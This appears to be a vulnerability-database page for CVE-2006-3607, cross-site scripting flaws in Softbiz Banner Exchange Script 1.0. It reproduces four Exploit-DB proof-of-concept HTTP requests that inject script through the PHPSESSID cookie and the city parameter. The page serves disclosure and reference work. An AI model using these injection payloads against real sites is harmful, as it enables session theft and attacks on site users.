CVE-2006-3607
published 2006-07-18CVE-2006-3607: Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Banner Exchange Script (aka Banner Exchange Network Script) 1.0 allow remote attackers to inject…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.73%
74.8th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Banner Exchange Script (aka Banner Exchange Network Script) 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the city parameter in (a) insertmember.php, and (2) a PHPSESSID cookie in (b) lostpassword.php, (c) gen_confirm_mem.php, and (d) index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softbizscripts | banner_exchange_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting
exploitdb·2006-06-29
CVE-2006-3607 SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting
SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18735/info
Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
GET http://www.example.com:80/gen_confirm_mem.php HTTP/1.0
Accept: */*
Host: www.example.com
Cookie: PHPSESSID=">alert(/Ellipsis+Security+Test/)
Exploit-DB
SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting
exploitdb·2006-06-29
CVE-2006-3607 SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting
SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18735/info
Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
POST http://www.example.com:80/insertmember.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 152
uname=1&add=1&city=">alert(/Ellipsis+Security+Test/)&state=1&c
Exploit-DB
SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting
exploitdb·2006-06-29
CVE-2006-3607 SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting
SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18735/info
Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
GET http://www.example.com:80/index.php HTTP/1.0
Accept: */*
Host: www.example.com
Cookie: PHPSESSID=">alert(/Ellipsis+Security+Test/)
Exploit-DB
SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting
exploitdb·2006-06-29
CVE-2006-3607 SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting
SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/18735/info
Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
GET http://www.example.com:80/lostpassword.php HTTP/1.0
Accept: */*
Host: www.example.com
Cookie: PHPSESSID=">alert(/Ellipsis+Security+Test/)
No writeups or analysis indexed.
http://ellsec.org/print.php?type=N&item_id=141http://www.securityfocus.com/archive/1/438705/100/200/threadedhttp://www.securityfocus.com/bid/18735https://exchange.xforce.ibmcloud.com/vulnerabilities/27460https://exchange.xforce.ibmcloud.com/vulnerabilities/27461http://ellsec.org/print.php?type=N&item_id=141http://www.securityfocus.com/archive/1/438705/100/200/threadedhttp://www.securityfocus.com/bid/18735https://exchange.xforce.ibmcloud.com/vulnerabilities/27460https://exchange.xforce.ibmcloud.com/vulnerabilities/27461
2006-07-18
Published